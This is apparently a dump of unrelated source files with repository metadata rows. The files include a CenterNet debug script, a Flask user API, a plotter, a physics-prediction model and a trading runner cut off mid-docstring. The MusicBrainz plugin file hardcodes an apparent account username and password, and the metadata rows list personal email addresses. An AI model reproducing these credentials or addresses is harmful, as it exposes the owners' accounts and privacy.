\combinacion["ELSCP041"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC1V2")}
\combinacion["ELSCP042"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC1V2 + 0.20*NV")}
\combinacion["ELSCP053"]{ descomp("1.00*G1 + 0.70*TC1V2")}
\combinacion["ELSCP054"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.20*NV")}
\combinacion["ELSCP061"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC3V1")}
\combinacion["ELSCP062"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC3V1 + 0.20*NV")}
\combinacion["ELSCP073"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC2V1")}
\combinacion["ELSCP074"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC2V1 + 0.20*NV")}
\combinacion["ELSCP093"]{ descomp("1.00*G1 + 0.70*TC2V1")}
\combinacion["ELSCP094"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.20*NV")}
\combinacion["ELSCP109"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC3V2")}
\combinacion["ELSCP110"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC3V2 + 0.20*NV")}
\combinacion["ELSCP129"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC2V2")}
\combinacion["ELSCP130"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC2V2 + 0.20*NV")}
\combinacion["ELSCP173"]{ descomp("1.00*G1 + 0.70*TC2V2")}
\combinacion["ELSCP174"]{ descomp("1.00*G1 + 0.70*TC2V2 + 0.20*NV")}
\combinacion["ELSCP189"]{ descomp("1.00*G1 + 0.70*TC2V2 + 0.70*TC3V1")}
\combinacion["ELSCP190"]{ descomp("1.00*G1 + 0.70*TC2V2 + 0.70*TC3V1 + 0.20*NV")}
\combinacion["ELSCP209"]{ descomp("1.00*G1 + 0.70*TC3V1")}
\combinacion["ELSCP210"]{ descomp("1.00*G1 + 0.70*TC3V1 + 0.20*NV")}
\combinacion["ELSCP217"]{ descomp("1.00*G1 + 0.70*TC3V1 + 0.70*TC3V2")}
\combinacion["ELSCP218"]{ descomp("1.00*G1 + 0.70*TC3V1 + 0.70*TC3V2 + 0.20*NV")}
\combinacion["ELSCP229"]{ descomp("1.00*G1 + 0.70*TC3V2")}
\combinacion["ELSCP230"]{ descomp("1.00*G1 + 0.70*TC3V2 + 0.20*NV")}
\combinacion["ELSCP453"]{ descomp("1.00*G1 + 0.60*NV")}
\combinacion["ELSCP454"]{ descomp("1.00*G1 + 0.70*TC3V2 + 0.60*NV")}
\combinacion["ELSCP456"]{ descomp("1.00*G1 + 0.70*TC3V1 + 0.60*NV")}
\combinacion["ELSCP458"]{ descomp("1.00*G1 + 0.70*TC3V1 + 0.70*TC3V2 + 0.60*NV")}
\combinacion["ELSCP461"]{ descomp("1.00*G1 + 0.70*TC2V2 + 0.60*NV")}
\combinacion["ELSCP465"]{ descomp("1.00*G1 + 0.70*TC2V2 + 0.70*TC3V1 + 0.60*NV")}
\combinacion["ELSCP470"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.60*NV")}
\combinacion["ELSCP474"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC3V2 + 0.60*NV")}
\combinacion["ELSCP479"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC2V2 + 0.60*NV")}
\combinacion["ELSCP490"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.60*NV")}
\combinacion["ELSCP492"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC3V1 + 0.60*NV")}
\combinacion["ELSCP495"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC2V1 + 0.60*NV")}
\combinacion["ELSCP500"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.60*NV")}
\combinacion["ELSCP502"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC3V2 + 0.60*NV")}
\combinacion["ELSCP505"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC2V2 + 0.60*NV")}
\combinacion["ELSCP510"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC1V2 + 0.60*NV")}
| [
"l.pereztato@gmail.com"
] | l.pereztato@gmail.com |
11814138337f2db2d0f27136c20633ef680bac49 | 07d1e4d5f55e00bae1376d6adf56070b8458aa52 | /src/debug.py | 2c69a113197ac8050dd0b220d9cebc258b0069cd | [
"MIT",
"BSD-3-Clause"
] | permissive | GRobled0/CenterNet | 0bc85ee7ad11f69eb9477ce0fec11397c3f333a1 | 740ecf06a96897b3545249bbb239264394283565 | refs/heads/master | 2023-02-11T15:02:10.692191 | 2021-01-05T20:16:22 | 2021-01-05T20:16:22 | 294,961,676 | 0 | 0 | MIT | 2020-09-12T14:38:15 | 2020-09-12T14:38:14 | null | UTF-8 | Python | false | false | 5,979 | py | import _init_paths
import os
import cv2
import csv
import pandas as pd
import numpy as np
import kalman
from opts import opts
from detectors.detector_factory import detector_factory
import datasetmaker as dm
from camera_params import cal_params as params_1
from camera_params_realsense import cal_params as params_2
image_ext = ['jpg', 'jpeg', 'png', 'webp', 'ppm', 'pgm']
threshold = 0.5 #limite de score para considerar silla
def dibujar_info(img, chair, info, color, color_txt):
img = cv2.rectangle(img, (chair[0], chair[1]), (chair[2], chair[3]), color, 2)
txt = info + str(" m")
font = cv2.FONT_HERSHEY_SIMPLEX
info_size = cv2.getTextSize(txt, font, 0.5, 2)[0]
img = cv2.rectangle(img.copy(),
(chair[0], int(chair[1] - info_size[1] - 2)),
(int(chair[0] + info_size[0]), int(chair[1] - 2)),
color, -1)
img = cv2.putText(img.copy(),txt, (chair[0], int(chair[1] - 2)),
font, 0.5, color_txt, thickness=1, lineType=cv2.LINE_AA)
return img
def dibujar_texto(texto, img, color):
overlay = cv2.putText(img.copy(), texto,
(10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1.0, color, 2)
overlay = cv2.addWeighted(overlay, 0.5, img.copy(), 0.5, 0, img.copy())
return overlay
def eval_total(ret, im, imd, i, opt, path, k_filter):
img = cv2.imread(im,-1)
#img = dm.calibrate_images(img, True)
img_deb = img.copy()
imgd = cv2.imread(imd,-1)
img_real = imgd.copy()
img_depth = (imgd.copy()/256).astype(np.uint8)
#img_cal = dm.calibrate_images((imgd.copy()/256).astype(np.uint8), False, opt)
#img_real = dm.distabs_img(img_real, opt)
#img_real = dm.change_values(img_real)
#img_real = dm.calibrate_images(img_real.copy(), False, opt)
#img_real = img_real/3276.7
img_deb_d = cv2.applyColorMap(cv2.convertScaleAbs(imgd.copy(), alpha=0.03), cv2.COLORMAP_JET)
if opt.dataset_name == 'realsense':
img_deb_d = cv2.applyColorMap(cv2.convertScaleAbs(imgd.copy(), alpha=0.03), cv2.COLORMAP_JET)
t = []
p = []
m = []
q = []
qq = []
frame = []
j = 0
if opt.kalman_filter:
for chair in ret['results'][57]:
if chair[4] > threshold:
frame.append(chair)
k_filter.frame_update(frame)
for chair in ret['results'][57]:
if chair[4] > threshold:
j = j + 1
vector = chair[0:4].copy()
if opt.dataset_name == 'realsense':
vector[0] = vector[0] - 25
vector[2] = vector[2] - 25
checked = dm.check(vector, img.shape)
crop_img = img_real[int(checked[1]):int(checked[3]), int(checked[0]):int(checked[2])]
dist = np.percentile(crop_img[crop_img > 0.05], 50) #se evitan valores nulos
dist = dm.distabs(dist, opt)
q1 = np.percentile(crop_img[crop_img > 0.05], 25)
q1 = dm.distabs(q1, opt)
q3 = np.percentile(crop_img[crop_img > 0.05], 75)
q3 = dm.distabs(q3, opt)
mean = np.mean(crop_img[crop_img > 0.05])
mean = dm.distabs(mean, opt)
if opt.kalman_filter:
p_dist = k_filter.predict(chair)
else:
p_dist = chair[5]
if opt.debug > 0:
img_deb = dibujar_info(img_deb.copy(), chair, "{:.2f}".format(p_dist), (255,0,0), (255,255,255))
img_deb_d = dibujar_info(img_deb_d.copy(), checked, "{:.2f}".format(dist), (255,255,255), (0,0,0))
t.append(dist)
p.append(p_dist)
m.append(mean)
q.append(q1)
qq.append(q3)
if opt.debug > 0:
img_deb = dibujar_texto("Prediction", img_deb.copy(), (0,0,0))
img_deb_d = dibujar_texto("Target", img_deb_d.copy(), (255,255,255))
img_debugger = cv2.hconcat([img_deb, img_deb_d])
cv2.imwrite(os.path.join(path, str(i) + '.jpg'), img_debugger)
return p, t, m, q, qq
def debug(opt):
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpus_str
Detector = detector_factory[opt.task]
detector = Detector(opt)
if opt.dataset_name == "external":
path_dataset = "/media/guillermo/60F9-DB6E/external"
else:
path_dataset = os.path.join(os.path.dirname(os.getcwd()), 'data')
path_dataset = os.path.join(path_dataset, opt.dataset_name)
path_test = os.path.join(path_dataset, 'images_test')
path_save = os.path.join(path_dataset, 'debug_images')
if not os.path.exists(path_save):
os.makedirs(path_save)
image_names = dm.carga_imagenes(os.path.join(path_test, 'rgb'))
image_names_d = dm.carga_imagenes(os.path.join(path_test, 'd'))
pred = []
target = []
img_nm = []
img_idx = []
media = []
q1 = []
q3 = []
i = 0
percentage_print = 0
k_filter = kalman.kalman_filter()
for image_name in image_names:
#img_rgb = cv2.imread(image_name,-1)
#img_rgb_cal = calibrate_images(img_rgb.copy(), True, opt)
ret = detector.run(image_name)
im = image_name
imd = image_names_d[i]
i = i + 1
percentage = int(i*100/len(image_names))
#para sacar por pantalla el progreso
if percentage >= percentage_print:
string = "["
for x in range(int(100/2.5)):
if x <= int(percentage/2.5):
string = string + "|"
else:
string = string + "-"
string = string + "] "
print(string + str(percentage) + '%')
percentage_print = percentage_print + 2.5
p, t, m, q, qq = eval_total(ret, im, imd, i, opt, path_save, k_filter)
for pp in p:
pred.append(pp)
for tt in t:
target.append(tt)
img_nm.append(im)
img_idx.append(i)
for mm in m:
media.append(mm)
for q11 in q:
q1.append(q11)
for q33 in qq:
q3.append(q33)
print("Analisis completado...")
data = {'Prediction': pred, 'Target': target, 'Media': media, 'Q1': q1, 'Q3': q3, 'Img_index': img_idx, 'Img_name': img_nm}
df = pd.DataFrame(data)
df.to_excel(os.path.join(path_dataset, 'debug_data.xlsx'))
print("Archivo creado")
if __name__ == '__main__':
opt = opts().init()
debug(opt)
| [
"grobled0@hotmail.com"
] | grobled0@hotmail.com |
b19a3f67cbb8d044b2a5ea9cd8fbb25fe0f96ee7 | 1ec3811f4cafe29f9165f78d059a192ec05a03e1 | /app/main/controller/user_controller.py | 848bc1d4bda58756eba8ea81b7656adda60a7b39 | [] | no_license | IcySkype/FlaskRestPlus | 87f964fecc428ace90b99b471e9608f24ac5fd46 | 2db2faf68d6b9c71907bf2b5cbcbbe932f4331ac | refs/heads/master | 2020-04-28T10:12:47.540299 | 2019-03-13T03:11:52 | 2019-03-13T03:11:52 | 175,193,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | from flask import request
from flask_restplus import Resource
from ..util.dto import UserDto
from ..service.user_service import save_new_user, get_all_users, get_a_user
api = UserDto.api
_user = UserDto.user
@api.route('/')
class UserList(Resource):
@api.doc('list_of_registered_users')
@api.marshal_list_with(_user, envelope='data')
def get(self):
#return registered user list
return get_all_users()
@api.response(201, 'User successfully created.')
@api.doc('create a new user')
@api.expect(_user, validate=True)
def post(self):
#create new user
data = request.json
return save_new_user(data=data)
@api.route('/<public_id>')
@api.param('public_id', 'The User identifier')
@api.response(404, 'User not found.')
class User(Resource):
@api.doc('get a user')
@api.marshal_list_with(_user)
def get(self, public_id):
#gets a specific user with public_id
user = get_a_user(public_id)
if not user:
api.abort(404)
else:
return user | [
"skytrizero@gmail.com"
] | skytrizero@gmail.com |
21b67cd73c3425afe749638e23831431e4628084 | 0f07107b016d2aee64788966b9f0d322ac46b998 | /moya/docgen/theme.py | 39c3d707e1310f7b2799f5a59c83826bd99563b2 | [
"MIT"
] | permissive | fkztw/moya | 35f48cdc5d5723b04c671947099b0b1af1c7cc7a | 78b91d87b4519f91dfdd2b40dab44e72f201a843 | refs/heads/master | 2023-08-09T09:20:21.968908 | 2019-02-03T18:18:54 | 2019-02-03T18:18:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,610 | py | from .. import iniparse
from fs.path import dirname, pathjoin
class Page(object):
def __init__(self, doc_class, settings):
self.doc_class = doc_class
self.settings = settings
def __repr__(self):
return "Page(%r, %r)" % (self.doc_class, self.settings)
def get(self, context, settings_name):
return context.sub(self.settings.get(settings_name, ""))
def get_path(self, context):
return context.sub(self.settings.get("path", ""))
class Theme(object):
def __init__(self, fs):
self.fs = fs
self.cfg = None
self.theme_settings = None
self.pages = []
self.read()
def get(self, section_name, key, default=None):
section = self.cfg.get(section_name, None)
if section is None:
return default
return section.get(key, default)
def read(self):
with self.fs.open("theme.ini", "rb") as settings_file:
cfg = iniparse.parse(settings_file)
self.cfg = cfg
self.theme_settings = cfg.get("theme", {})
for section, settings in cfg.items():
what, _, name = section.partition(":")
if what == "page":
page = Page(name, settings)
self.pages.append(page)
def get_pages(self, doc):
doc_class = doc.doc_class
for page in self.pages:
if page.doc_class == doc_class:
yield page
def get_relative_path(self, path):
ini_path = dirname(self.fs.getsyspath("theme.ini"))
path = pathjoin(ini_path, path)
return path
| [
"willmcgugan@gmail.com"
] | willmcgugan@gmail.com |
ca2a6787fbbbc2183e4852f837cd9b38f57a2152 | ca1182f1b43126bc55736725ae9219f30aec6d84 | /venv/bin/pip3.6 | 7b2bdc1104d2f79da1bb4837699daf22ae6ec0ad | [] | no_license | jesusCDev/Instagram-Bot-With-Selenium | c1501865d9b4563cde39beeffd0bbac2727fe46b | b19ad8f276b74f38b0fa51dc771385dd56e80f10 | refs/heads/master | 2022-04-08T15:36:09.917401 | 2020-01-03T01:35:35 | 2020-01-03T01:35:35 | 104,346,246 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 433 | 6 | #!/home/jesuscdev/Programming/Pycharm/InstagramBot-With-Selenium/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.6'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.6')()
)
| [
"jesuscdev@gmail.com"
] | jesuscdev@gmail.com |
a291c9eac13c4ace0db60d7b2a34622f71668b2c | ad7c11f673c290eeb2fa8e3a97c06878553d0035 | /plotterWsvgPreview.py | 24fd751e6305cd868e80d9a820c4f0f09f4b227f | [] | no_license | jefftrevino/sol118 | c05a1cc26facfa31cb0fc19de8de26bbc1a11464 | 82c0e463e74d4aca3edcce8d9e3dd4c38141d051 | refs/heads/master | 2021-01-12T06:21:21.485247 | 2017-01-10T01:10:24 | 2017-01-10T01:10:24 | 77,346,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,365 | py | import svgwrite
from matplotlib import pyplot
from shapely.geometry import Polygon, LineString
from shapely.affinity import scale, rotate
from chiplotle import (
hpgl,
instantiate_plotters
)
class Drawing:
def __init__(self, geoms=None):
self.geoms = geoms or []
self.scale_ratio = 1
self.get_bounds()
self.svg = svgwrite.Drawing(
filename="preview.svg",
size=("2560px", "1600px")
)
self.svg.viewbox(
width=self.width,
height=self.height,
)
self.add_bounds_preview()
self.plotter = None
# self.scale_ratio = self.height / 1000
#self.scale_ratio = 2.8
def plot(self, geom=None):
if not self.plotter:
plotters = instantiate_plotters()
self.plotter = plotters[0]
if geom:
self.add(geom)
for geom in self.geoms:
self.plot_geom(geom)
def add(self, geom):
self.geoms.append(self.scale_to_fit(geom))
def plot_geom(self, geom):
if hasattr(geom, 'coords'):
# assume it is a linear ring or linestring
self.plot_coords([coord for coord in geom.coords])
elif hasattr(geom, 'exterior'):
# assume it has a Polygon-like interface
self.plot_geom(geom.exterior)
for ring in geom.interiors:
self.plot_geom(ring)
elif hasattr(geom, 'geoms'):
# assume this is a collection of objects
for geom in geom.geoms:
self.plot_geom(geom)
else:
raise NotImplementedError(
"I don't know how to plot {}".format(type(geom)))
def preview(self, geom=None, filename="preview.svg"):
if geom:
self.add(geom)
for geom in self.geoms:
self.preview_geom(geom)
print(self.svg.tostring())
self.svg.save()
def preview_geom(self, geom, **kwargs):
if hasattr(geom, 'xy'):
# assume it is a linear ring or linestring
line_points = geom.coords
x_offset = self.width/2
y_offset = self.height/2
line_points = [
(x[0]+x_offset, x[1]*-1 + y_offset)
for x in line_points]
self.svg.add(self.svg.polyline(
points=line_points,
stroke_width="5",
fill="rgb(255,255,255)",
stroke="black",)
)
elif hasattr(geom, 'exterior'):
# assume it has a Polygon-like interface
self.preview_geom(geom.exterior, **kwargs)
for ring in geom.interiors:
self.preview_geom(ring, **kwargs)
elif hasattr(geom, 'geoms'):
# assume this is a collection of objects
for geom in geom.geoms:
self.preview_geom(geom, **kwargs)
else:
raise NotImplementedError(
"I don't know how to preview {}".format(type(geom)))
def get_bounds(self):
self.bounds_poly = Polygon([
(-11640, -8640),
(-11640, 8640),
(10720, 8640),
(10720, -8640),
(-11640, -8640),
])
self.bounds = self.bounds_poly.bounds
self.width = 11640 + 10720
self.height = 8640 * 2
def add_bounds_preview(self):
width_string = str(self.width)
height_string = str(self.height)
self.svg.add(self.svg.rect(
insert=(0, 0),
size=(width_string+"px", height_string+"px"),
stroke_width="100",
stroke="black",
fill="rgb(255,255,255)",
))
def plot_coords(self, coords):
start = hpgl.PU([coords[0]])
self.plotter.write(start)
threshold = 300
while len(coords) > threshold:
command = hpgl.PD(coords[:threshold])
self.plotter.write(command)
coords = coords[threshold:]
command = hpgl.PD(coords)
self.plotter.write(command)
end = hpgl.PU([coords[-1]])
self.plotter.write(end)
def scale_to_fit(self, geom):
return scale(
geom,
xfact=self.scale_ratio,
yfact=self.scale_ratio,
origin=(0.0, 0.0),
)
| [
"jeffrey.trevino@gmail.com"
] | jeffrey.trevino@gmail.com |
e14f43ea5025e2ed22934b1c5b74a03a9f91f38d | 579e3d7310f8b25afc694f647a0b7e5e91329a21 | /neuralphys/models/rpin.py | 2973633e11850b4a073d8f64dcf96c818d3d5c61 | [] | no_license | Alexadlu/RPIN | cd3514312410e4386ed12f435f1c0300e054fb21 | eebb8f64a1dd566585566e378ffb05aa5616ae18 | refs/heads/master | 2022-11-26T22:29:43.849778 | 2020-08-06T01:19:38 | 2020-08-06T01:19:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,098 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision.ops.roi_align import RoIAlign
from neuralphys.utils.config import _C as C
from neuralphys.models.layers.IN import InterNet
from neuralphys.models.backbones.build import build_backbone
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.input_time_step = C.RPIN.INPUT_SIZE
self.ve_feat_dim = C.RPIN.VE_FEAT_DIM # visual encoder feature dimension
self.in_feat_dim = C.RPIN.IN_FEAT_DIM # interaction net feature dimension
self.num_objs = C.RPIN.NUM_OBJS
self.po_feat_dim = (
self.in_feat_dim if C.RPIN.COOR_FEATURE_EMBEDDING or C.RPIN.COOR_FEATURE_SINUSOID else 2
) if C.RPIN.COOR_FEATURE else 0 # position feature dimension
# build image encoder
self.backbone = build_backbone(C.RPIN.BACKBONE, self.ve_feat_dim)
if C.RPIN.IMAGE_UP:
self.blur_conv = nn.Conv2d(self.ve_feat_dim, self.ve_feat_dim, kernel_size=3, padding=1)
# extract object feature
pool_size = C.RPIN.ROI_POOL_SIZE
spatial_scale = 1.0 / 2.0 if C.RPIN.IMAGE_UP else 1.0 / 4.0
self.roi_align = RoIAlign((pool_size, pool_size), spatial_scale=spatial_scale, sampling_ratio=1)
self.fc0 = nn.Linear(self.ve_feat_dim * pool_size * pool_size, self.in_feat_dim)
# coordinate features
if C.RPIN.COOR_FEATURE:
if C.RPIN.COOR_FEATURE_EMBEDDING:
self.fc0_coor = nn.Linear(2, self.in_feat_dim)
self.fc1_coor = nn.Linear(self.in_feat_dim, self.in_feat_dim)
self.red_coor = nn.Linear(self.in_feat_dim + self.po_feat_dim, self.in_feat_dim)
# interaction networks
self.temporal_input = 4
self._init_interaction_net()
self.decoder_output = 4
self.aggregator = nn.Linear(self.in_feat_dim * self.temporal_input, self.in_feat_dim)
self.state_decoder = nn.Linear(self.in_feat_dim, self.decoder_output)
def _init_interaction_net(self):
# interaction network
graph = []
for i in range(self.temporal_input):
graph.append(InterNet(self.in_feat_dim))
self.graph = nn.ModuleList(graph)
def forward(self, x, rois, src_coor_features=None, num_rollouts=8, data_pred=None, phase=None, ignore_idx=None):
self.num_objs = rois.shape[2]
# x: (b, t, c, h, w)
# reshape time to batch dimension
time_step = x.shape[1]
assert self.input_time_step == time_step
# threshold, used for conditional IN computation
r = ((rois[..., 4] - rois[..., 2]) / 2 + (rois[..., 3] - rois[..., 1]) / 2) / 2
r = r.mean(1).detach()
x = self.extract_object_feature(x, rois)
# coordinate feature, provided as input
if C.RPIN.COOR_FEATURE:
coor_features = src_coor_features[:, :time_step]
x = self.attach_position_embedding(x, coor_features)
bbox_rollout = []
state_list = [x[:, 0], x[:, 1], x[:, 2], x[:, 3]]
coor_list = [src_coor_features[:, 0], src_coor_features[:, 1], src_coor_features[:, 2], src_coor_features[:, 3]]
for i in range(num_rollouts):
c1 = self.graph[0](state_list[0], coor_list[0], r, ignore_idx)
c2 = self.graph[1](state_list[1], coor_list[1], r, ignore_idx)
c3 = self.graph[2](state_list[2], coor_list[2], r, ignore_idx)
c4 = self.graph[3](state_list[3], coor_list[3], r, ignore_idx)
all_c = torch.cat([c1, c2, c3, c4], 2)
s = self.aggregator(all_c)
bbox = self.state_decoder(s)
bbox_rollout.append(bbox)
state_list = state_list[1:] + [s]
coor_list = coor_list[1:] + [bbox[..., 2:]]
bbox_rollout = torch.stack(bbox_rollout).permute(1, 0, 2, 3)
bbox_rollout = bbox_rollout.reshape(-1, num_rollouts, self.num_objs, self.decoder_output)
outputs = {
'bbox': bbox_rollout
}
return outputs
def attach_position_embedding(self, x, coor_features):
emb_features = coor_features
if C.RPIN.COOR_FEATURE_EMBEDDING:
emb_features = F.relu(self.fc0_coor(emb_features))
emb_features = F.relu(self.fc1_coor(emb_features))
x = torch.cat([x, emb_features], dim=-1)
x = F.relu(self.red_coor(x))
return x
def extract_object_feature(self, x, rois):
# visual feature, comes from RoI Pooling
batch_size, time_step = x.shape[0], x.shape[1]
x = x.reshape((batch_size * time_step,) + x.shape[2:]) # (b x t, c, h, w)
x = self.backbone(x)
if C.RPIN.IMAGE_UP:
x = F.interpolate(x, scale_factor=2)
x = F.relu(self.blur_conv(x)) # (batch x time, c, h, w)
roi_pool = self.roi_align(x, rois.reshape(-1, 5)) # (b * t * num_objs, feat_dim)
roi_pool = roi_pool.reshape(batch_size, time_step, self.num_objs, -1)
x = F.relu(self.fc0(roi_pool)) # (b, t, num_obj, feat_dim)
return x
| [
"macshqi@gmail.com"
] | macshqi@gmail.com |
f13a77c853df1627ee0607c358aa576706d35efe | 1760630328334270695d88596332d6b7be25def9 | /solutions/005_smallest_multiple/smallest_multiple.py | 03233411c9b01b846833f4359232ca520ca2869a | [] | no_license | ZekeMiller/euler-solutions | 1320aea8ebcde9f9ca0b971086820f8b4591f6bc | 472e9609cea9b87642ca90bf58dcd1361ddfd736 | refs/heads/master | 2021-06-02T20:45:15.248518 | 2019-11-12T20:49:28 | 2019-11-12T20:49:28 | 131,333,138 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | from functools import reduce
from operator import mul
def genPrimes( max ):
primes = [2]
for i in range( 3, max, 2 ):
if 0 not in [ i % k for k in primes ]:
primes += [ i ]
# for k in primes:
# if i % k == 0:
# print( i, k )
# break
# primes += [ i ]
return primes
def lcm( vals ):
result = genPrimes( max( vals ) )
result.remove( 2 )
n = 1
while True:
if 2 ** n not in vals:
result += [ 2 ** ( n - 1 ) ]
break;
n += 1
for res in result:
if res ** 2 in vals:
result.remove( res )
result += [ res ** 2 ]
return reduce(mul, result, 1)
vals = [ i for i in range( 1, 21 ) ]
print( lcm( vals ) )
| [
"zfm6866@rit.edu"
] | zfm6866@rit.edu |
08af56622c50f5c76d675410fd3e23b7fb5c8bca | b401baaea0bd296a4ee7aa7acb6d054ea5bc93cc | /babyjesus/babyjesus/wsgi.py | ee247676f00f013423c8aa79f1f91e75bf762561 | [] | no_license | Adamhunter108/aliases | 4ff6f060c3b4020d1097ec3f8e854e3e6ce29925 | abaca4e87a163d8a68989b2d767042d3da0fdc7d | refs/heads/main | 2023-08-27T02:22:34.146353 | 2021-10-11T21:21:20 | 2021-10-11T21:21:20 | 367,797,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
WSGI config for babyjesus project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "babyjesus.settings")
application = get_wsgi_application()
| [
"61752774+Adamhunter108@users.noreply.github.com"
] | 61752774+Adamhunter108@users.noreply.github.com |
6da97c918d990c76993a7fb6019a95481f022014 | cf0943d5560b32afe03c551aeb4d71ba7b4fd563 | /catstuff/plugins/musicbrainz/main.py | e006f96e924a21f81943132ad2cc8bb9f1d813c1 | [
"MIT"
] | permissive | modora/catstuff | 96d87a1922d99398ad4dbb7c656ecf90e2e3bf3c | 7a4ea67e26774e42e90d0c71a4b2c299fe506d73 | refs/heads/master | 2021-09-01T09:02:32.896399 | 2017-12-26T05:07:19 | 2017-12-26T05:07:19 | 114,436,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,368 | py | raise NotImplementedError("BROKEN")
import catstuff.core.manager
import os
import musicbrainzngs
default_version = '0.1'
__dir__ = os.path.dirname(os.path.realpath(__file__))
__plugin_file__ = os.path.join(__dir__, "musicbrainz.plugin")
__mod__, __build__, _ = catstuff.core.plugins.import_core(__plugin_file__)
__version__ = catstuff.core.plugins.import_documentation(__plugin_file__).get('Version') or default_version
username = 'dersal'
password = '$G0M4KrvG60sFsO7'
class Musicbrainz(catstuff.core.plugins.Collection):
def __init__(self, **kwargs):
super().__init__(__mod__, __build__)
self.version = __version__
musicbrainzngs.set_useragent(app='.'.join(('catstuff', __mod__)),
version=self.version)
defaults = {
"username": '',
"password": '',
'host': 'musicbrainz.org',
'caa_host': 'coverartarchive.org'
}
for (attr, default) in defaults.items():
setattr(self, attr, kwargs.get(attr, default))
def auth(self, username, password):
assert isinstance(username, str)
assert isinstance(password, str)
self.username = username
self.password = password
def main(self, username, password, **kwargs):
self.auth(username, password)
def search(self, service, query='', limit=None, offset=None, strict=False, **fields):
func = {
'annotations': musicbrainzngs.search_annotations,
'areas': musicbrainzngs.search_areas,
'artists': musicbrainzngs.search_artists,
'events': musicbrainzngs.search_events,
'instruments': musicbrainzngs.search_instruments,
'labels': musicbrainzngs.search_labels,
'places': musicbrainzngs.search_places,
'recordings': musicbrainzngs.search_recordings, # songs
'release_groups': musicbrainzngs.search_release_groups,
'releases': musicbrainzngs.search_releases, # albums
'series': musicbrainzngs.search_series,
'works': musicbrainzngs.search_works
}.get(service)
if func is None:
raise NotImplementedError("{} not a search option".format(service))
return func(query=query, limit=limit, offset=offset, strict=strict,
**fields) | [
"swubro@gmail.com"
] | swubro@gmail.com |
9458f3ce00791ddc49646c8c8aa298f325f5846a | 11f7fa68ea8d18ae6ef35e739f092630a3755f60 | /python/list/invetList.py | 05423038078ad59c1ec1a8ba6229fcb243bdd719 | [] | no_license | Edgar3g/date_struct | d064c2d47dc81359d0365d4b3ff12fbcfaa93ead | 00705a1846e21d6ede06ae2fbebdc34d11716f46 | refs/heads/master | 2023-04-25T04:06:58.193313 | 2021-05-06T13:47:30 | 2021-05-06T13:47:30 | 337,095,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | def inverter_lista(lista):
tamanho = len(lista)
limite = tamanho // 2
for i in range(limite):
aux = lista[i]
lista[i] = lista[n - i]
liata[tamanho] = aux
def inverter_lista2(lista):
nova_lista = []
tamanho = len(lista)
for i in range(tamanho):
nova_lista.append(lista[tamanho - i])
return nova_lista
| [
"dikengeofficial@gmail.com"
] | dikengeofficial@gmail.com |
ca8c94fb16c3dcc6a3fee1dfea471e6a033318b8 | 46ee99adf99352b7879c5b2bdbb669f33549cc7c | /runner.py | 7d450ece39fe91252134ce0ec89ba0e639b08c1b | [] | no_license | webclinic017/TBDStructure | d85a01ec04a95a85bb82f2571b5fec898246d9f4 | 9b9b02088c7dcc5786f985dd17292e184b5ce6c2 | refs/heads/main | 2023-03-21T01:21:29.665270 | 2021-02-06T01:28:36 | 2021-02-06T01:28:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,199 | py | import sys
import traceback
from PyQt5.QtWidgets import QApplication
from multiprocessing import Queue, Process
from roboticks.data import DataHandler
from roboticks.portfolio import Portfolio
from roboticks.execution import ExecutionHandler
from db import UserDB, PriceDB
from strategies import STRATEGY
try:
from ebest import ebest_data
except:
print('Ebest import가 실패하였습니다.')
try:
from virtual.virtual_data import VirtualAPI
except:
print('Virtual import가 실패하였습니다')
try:
from kiwoom.realtime import KiwoomRealtimeAPI
except:
print('Kiwoom import가 실패하였습니다.')
class Runner:
def __init__(self, username: str):
"""
아직 실행된 적 없는 전략 같은 경우 initial_cap을 설정해줘야 하지만
이미 실행되고 있는 전략 같은 경우 DB에 저장하여 불러오는 방식으로 실행할 수 있다.
